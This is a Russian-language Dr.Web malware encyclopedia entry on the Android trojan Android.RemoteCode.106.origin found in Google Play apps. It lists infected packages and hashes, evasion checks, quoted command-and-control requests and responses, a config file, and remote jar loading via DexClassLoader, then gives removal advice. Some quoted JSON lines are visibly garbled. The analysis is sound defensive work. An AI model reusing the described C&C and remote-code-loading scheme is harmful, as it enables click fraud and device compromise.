Защити созданное

Другие наши ресурсы

  • free.drweb.ru — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.ru — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.ru/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

+ Добавить в библиотеку

Моя библиотека

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами

Профиль

Профиль

Android.RemoteCode.106.origin

Добавлен в вирусную базу Dr.Web:2017-11-14
Описание добавлено:2017-11-13
SHA1:Имя программного пакетаВерсия приложения с троянцем
0e5e5cfbeb05fe27f59c8aa15bfca3556cbe7005com.alkalinelabs.bandgame1.47
29bbbcdbc888a7ff7e7bfaa96b3815a604b903fccom.gamehero.sweetbakerymatch3saga3.0
287aea9ca36ace404372f98e222ab2d509e49019com.gamehero.cartoonracoon1.0.2
1cd9537c376d139f91b3628e01c7d0e2079ba2e5com.antee.biblicalquiz1.8
3f50c348c94a53164d0bd241773c9b90aee3a85fen.biblequiz.pro2.4
c916a6fa36b76bd0af8b0a181d3f349fd086c19dcom.justfclean.fustc1.0
d88f7805a619f108b55921269e94c31fbdf1d4f5com.getrewarded1.9
8f9587da8dac4befc9617817ded31297a70e9328com.alkalinelabs.learntosing1.2
78dec5a8ff19c27211542ee7a251c3fb6f44df4acom.mdroidapps.easybackupv.4.9.15

Троянец для ОС Android, который может быть встроен в безобидные приложения. Несколько программ с Android.RemoteCode.106.origin были выявлены в каталоге Google Play.

Троянец запускается автоматически в следующих случаях:

  • включение зараженного мобильного устройства (отслеживается системное событие android.intent.action.BOOT_COMPLETED);
  • получение намерения MOBGUN_REPORT_INTENT, которое отправляется каждые 30 секунд с помощью класса AlarmManager. На устройствах с ОС Android 5.0 и выше запуск происходит каждые 30 секунд с помощью JobScheduler;
  • старт приложения, в которое встроен Android.RemoteCode.106.origin.

Android.RemoteCode.106.origin не проявляет активности, если на зараженном устройстве отсутствует заданное число фотографий, контактов в телефонной книге и звонков в журнале вызовов. Например, для версии троянца из приложения Bible Trivia v1.8 (sha1: 1cd9537c376d139f91b3628e01c7d0e2079ba2e) на устройстве должно быть:

  • не менее 10 фотографий;
  • не менее 3 записей о звонках в журнале вызовов за последние 3 дня;
  • не менее 10 контактов, имеющих телефонные номера.

Если при проверке указанные условия выполняются, Android.RemoteCode.106.origin передает на управляющий сервер запрос вида:

GET http://mobgun*********.com:443/sys/k/get/?pn=com.antee.biblicalquiz&sub=test_sub_id&pub=90154&aid=99d078094e1be3b9&av
 HTTP/1.1 =16&v=11&b=Z2VuZXJpYw==&m=c2Rr
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host:  :443 mobgun*********.com
Connection: Keep-Alive
Accept-Encoding: gzip

В ответ он получает команду со списком веб-адресов, по которым ему необходимо перейти:

{
   "result":true,
   "k":[
      {
         "t":1,
         "u":" " http://download********.top/click.php?cnv_id=[CLICK_ID]&payout=0.01
      },
      {
         "t":2,
         "u":" " http://download********.top/click.php?cnv_id=[CLICK_ID]&cnv_status=[TIME]&payout=0.01
      },
      {
      {
         "t":0,
         "u":" }" http://download********.top/click.php?key=du7ww2dgf7uje503rvmd&pubid={pubid
      }
   ]
}

После этого троянец пытается перейти по полученным ссылкам. В случае успешного перехода и получения ответа Android.RemoteCode.106.origin приступает к выполнению своего основного вредоносного функционала.

Троянец передает на сервер http://mobgun*********.com/sys/m/g/ запрос вида:

{
   "v":11,
   "ref":"02e1f7vtlfnbzac1",
   "model":"sdk",
   "pubId":"90154",
   "subId":"test_sub_id",
   "brand":"generic",
   "pn":"com.antee.biblicalquiz",
   "m":[
   ],
   "aid":"99d078094e1be3b9",
   "av":16
}

В ответ он получает команду, в которой указан список дополнительных модулей (x.awvw.Awvw – Android.Click.199.origin, x.wpp.Wpp – Android.Click.200.origin), а также файл конфигурации, которые необходимо загрузить с сервера:

{
   "result":true,
   "m":[
      {
         "t":1,
         "n":"x.awvw.Awvw",
         "h":"b42c215188486c7ed65341d2fdefda3b",
         "u":"/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/"
      },
      {
         "t":1,
         "n":"x.wpp.Wpp",
         "h":"ce77c3c4b33b0d078afdec6fbfc21093",
         "u":"/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/"
      },
      {
         "t":3,
         "n":"config",
         "h":"25507ab4013f1deafebf14487cebcb61",
         "u":"/sys/m/l/e2a018b0-c3d5-40a6-ae44-4ef7bec205c3/"
      }
   ],
   "time":1510217665299
}

Конфигурационный файл троянца имеет следующий вид:


{
   "debug":true,
   "debugList":[
      "76e5379d356d8156",
      "644e08515fb7ab5",
      "c6f19b3e796ea3fb",
      "76e5379d356d8156",
      "e946a5959a48945b"
   ],
   "awvw":true,
   "awvwUrl":"http://*.*.65.235:18011/sys/action/?t={TYPE}&pn={PACKAGENAME}&aid={ANDROIDID}&av={APIVERSION}&brand={B
}" RAND}&model={MODEL}&msg={MSG}&tid={TID}&sv={SOFTVERSION ,
   "awvwTaskUrl":" " http://*.*.65.235:18080/sys/task/get/ ,
   "awvwPingUrl":" " http://*.*.65.235:18011/sys/ping/ ,
   "awvwMaxWorkers":3,
   "awvwMaxAttempts":5,
   "awvwAttemptDelay":30000,
   "awvwDebug":false,
   "awvwVisible":false,
   "awvwVisible":false,
   "awvwTouchable":false,
   "glPingDelay":900000,
   "awvwRefreshDelay":60000,
   "awvwMaxNoRefresh":600000,
   "awvwCookieDelay":30000,
   "awvwPageFinishTime":15000,
   "awvwClickTimeout":15000
}

Ссылка на загружаемые модули формируется следующим образом: имя хоста http://mobgun*********.com + строка u из полученного ответа от сервера.

Скачиваемые вредоносные компоненты представляют собой jar-файлы, которые после загрузки запускаются с использованием класса DexClassLoader.

Новость о троянце

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Российский разработчик антивирусов Dr.Web

Опыт разработки с 1992 года

Dr.Web пользуются в 200+ странах мира

Dr.Web в Реестре Отечественного ПО

Поставка антивируса как услуги с 2007 года

Круглосуточная поддержка на русском языке

© «Доктор Веб»
2003 — 2018

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125040, Россия, Москва, 3-я улица Ямского поля, вл.2, корп.12А